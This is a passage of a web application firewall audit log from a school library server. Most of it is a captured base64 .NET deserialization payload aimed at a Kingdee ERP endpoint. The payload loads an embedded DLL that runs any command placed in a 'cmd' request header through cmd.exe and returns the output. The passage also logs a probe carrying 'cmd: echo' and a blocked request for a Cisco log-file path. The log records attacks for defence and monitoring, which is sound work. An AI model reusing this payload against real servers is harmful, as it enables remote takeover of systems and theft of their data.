gAhALQAHAAhANIAIQApAN0ACgAhAPUAJgAxAAIBCgA5ADAACgA5ADQBKwBBAEIBMAAhAFsBNQBJAJoBOgBRAKYBPwBZALYBRABBAL0BMABBAMsBSgBBAOYBSgBBAAACSgA5ABQCTwA5ADECUwBpAE8CWAAxAFkCMAAxAF8CCgAxAGUCCgAuAAsAZQAuABMAbgBcAASAAAAAAAAAAAAAAAAAAAAAAJQAAAAEAAAAAAAAAAAAAAABABkAAAAAAAIAAAAAAAAAAAAAABMAnQAAAAAAAgAAAAAAAAAAAAAAAQAiAAAAAAACAAAAAAAAAAAAAAABABkAAAAAAAAAADxNb2R1bGU+AHQyZnZ6NGlsLmRsbABFAG1zY29ybGliAFN5c3RlbQBPYmplY3QALmN0b3IAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHQyZnZ6NGlsAFN5c3RlbS5XZWIASHR0cENvbnRleHQAZ2V0X0N1cnJlbnQASHR0cFNlcnZlclV0aWxpdHkAZ2V0X1NlcnZlcgBDbGVhckVycm9yAEh0dHBSZXNwb25zZQBnZXRfUmVzcG9uc2UAQ2xlYXIAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3MAUHJvY2Vzc1N0YXJ0SW5mbwBnZXRfU3RhcnRJbmZvAHNldF9GaWxlTmFtZQBIdHRwUmVxdWVzdABnZXRfUmVxdWVzdABTeXN0ZW0uQ29sbGVjdGlvbnMuU3BlY2lhbGl6ZWQATmFtZVZhbHVlQ29sbGVjdGlvbgBnZXRfSGVhZGVycwBnZXRfSXRlbQBTdHJpbmcAQ29uY2F0AHNldF9Bcmd1bWVudHMAc2V0X1JlZGlyZWN0U3RhbmRhcmRPdXRwdXQAc2V0X1JlZGlyZWN0U3RhbmRhcmRF
cnJvcgBzZXRfVXNlU2hlbGxFeGVjdXRlAFN0YXJ0AFN5c3RlbS5JTwBTdHJlYW1SZWFkZXIAZ2V0X1N0YW5kYXJkT3V0cHV0AFRleHRSZWFkZXIAUmVhZFRvRW5kAFdyaXRlAEZsdXNoAEVuZABFeGNlcHRpb24AAAAPYwBtAGQALgBlAHgAZQAAB2MAbQBkAAAHLwBjACAAAAAAAODxsDW2z09DrP9c0go3YuQACLd6XFYZNOCJAyAAAQQgAQEICLA/X38R1Qo6BAAAEhEEIAASFQQgABIZBCAAEiEEIAEBDgQgABIlBCAAEikEIAEODgUAAg4ODgQgAQECAyAAAgQgABIxAyAADggHBBIREh0ODggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEAAADMJgAAAAAAAAAAAADuJgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4CYAAAAAAAAAAAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABp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aWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0
dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkI
AAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNp
b249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu
PWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=","format":"3"} --20ec0876-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 
Connection: close Content-Type: text/html; charset=iso-8859-1 --20ec0876-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=text/json"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747937955747136 5571 (- - -) Stopwatch2: 1747937955747136 5571; combined=3635, p1=599, p2=2937, p3=32, p4=37, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20ec0876-Z-- --9618de2d-A-- [23/May/2025:01:19:21 +0700] aC9qqeThJmFSRJ5-OZfqHgAAAFI 103.236.140.4 33042 103.236.140.4 8181 --9618de2d-B-- POST /Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 15909 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Content-Type: text/json cmd: echo QZPuWzkJnV X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 162993424 --9618de2d-C-- {"ap0":"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","format":"3"} --9618de2d-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: 
text/html; charset=iso-8859-1 --9618de2d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=text/json"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747937961750232 4329 (- - -) Stopwatch2: 1747937961750232 4329; combined=3008, p1=493, p2=2433, p3=25, p4=30, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9618de2d-Z-- --73aa2d60-A-- [23/May/2025:01:21:04 +0700] aC9rEOThJmFSRJ5-OZfqJwAAAFc 103.236.140.4 33088 103.236.140.4 8181 --73aa2d60-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 163523833 --73aa2d60-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --73aa2d60-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747938064182310 1671 (- - -) Stopwatch2: 1747938064182310 1671; combined=697, p1=331, p2=336, p3=0, p4=0, p5=29, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for 